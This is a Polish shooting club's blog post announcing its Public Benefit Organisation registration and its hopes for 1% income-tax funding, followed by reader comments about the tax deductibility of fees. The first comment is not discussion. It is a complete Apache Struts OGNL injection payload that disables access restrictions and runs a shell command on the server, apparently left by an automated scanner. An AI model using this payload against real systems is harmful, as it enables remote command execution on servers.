Stowarzyszenie KS Amator jest Organizacją Pożytku Publicznego

30 maja 2019 roku KRS zaktualizowało wpis na temat Stowarzyszenia KS Amator, dopisując status Organizacji Pożytku Publicznego (OPP).

O wpis OPP staraliśmy się od września 2018 roku. Po wielomiesięcznym oczekiwaniu, na koniec roku przyszła niezbyt miła wiadomość: KRS odrzucił wniosek, zarzucając błędy formalne. Na dokładkę referendarz sądowy nie odmówiła lekkiej kąśliwości, stwierdzając w piśmie, że nasze cele „można by uznać co do zasady” za działalność pożytku publicznego.
Przesłaliśmy skargę na postanowienie. W całej drodze wspierała mnie Radczyni Prawna (Pani Radca Prawna, po staropolsku) z Sektora 3, czyli inkubatora organizacji pozarządowych we Wrocławiu. Po zaledwie 5 miesiącach skarga została rozpatrzona i wpis jest!

OPP jest kolejnym krokiem w długim marszu ku profesjonalizacji organizacji. Główny cel to uzyskanie dostępu do 1% PIT, które mogą się stać istotnym źródłem finansowania KS Amator w przyszłości. Mamy ambitne plany: chcielibyśmy, żeby większość członków KS Amator nie musiało płacić ani złotówki za utrzymanie swoich pozwoleń. OPP może w tym tylko pomóc.
Państwo powinno finansować rozwój strzelectwa, bo to fajne, rodzinne i bezpieczne hobby budujące cenne więzi społeczne, podnoszące świadomość obywatelską, zachęcające do praworządności oraz patriotyzmu. Jeśli nie możemy uzyskać pomocy świadomej, oficjalnej, to dzięki 1% PIT możemy uzyskać pomoc nieświadomą, nieoficjalną i być może nieplanowaną.

Zrobimy wszystko, żeby status Organizacji Pożytku Publicznego nie był wyłącznie formalnym gestem, ale wyraźnie odznaczał się w naszych działaniach. Avanti!

34 thoughts on “Stowarzyszenie KS Amator jest Organizacją Pożytku Publicznego

 1. Avatarbesmirch

  %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‚com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‚+ #str).(#iswin=(@java.lang.System@getProperty(‚os.name’).toLowerCase().contains(‚win’))).(#cmds=(#iswin?{‚cmd.exe’,’/c’,#cmd}:{‚/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

 2. AvatarMozdyn

  O ile dobrze się orientuje, to dzięki statusowi OPP darowizny na cele statutowe będzie można odliczyć od dochodu. To oznacza, że wszelkie wpłaty „na cele statutowe”, czyli treningi, składki członkowskie, doszkolenia, kursy itp będzie można sobie odliczyć, czyli de facto będą bez podatku dochodowego – czyli przynajmniej 18% taniej.
  Ave Prezes!

   1. AvatarHaggar

    Tu jedna uwaga – wiem, że US kwestionowały odliczenia jako darowizny składek „obowiązkowych” lub „ekwiwalentnych” (dotyczyło to składek w stowarzyszeniu o charakterze sportowym).

    W skrócie chodzi o to, że:
    1) Jeśli przynależność do stowarzyszenia jest uzależniona od wpłacenia składki (składka obowiązkowa) to dla US to nie jest darowizna, bo darowizna jest dobrowolna.
    2) Jeśli składka ma charakter ekwiwalentny, czyli dostajemy za nią coś wymiernego (np. bezpłatny dostęp do obiektu sportowego) to też nie ma to charakteru darowizny.

    Temat jest z przed kilku lat, nie wiem jak teraz, być może interpretacja US „znormalniała” ale jeśli ktoś chciałby skorzystać, to nich się lepiej upewni.

Dodaj komentarz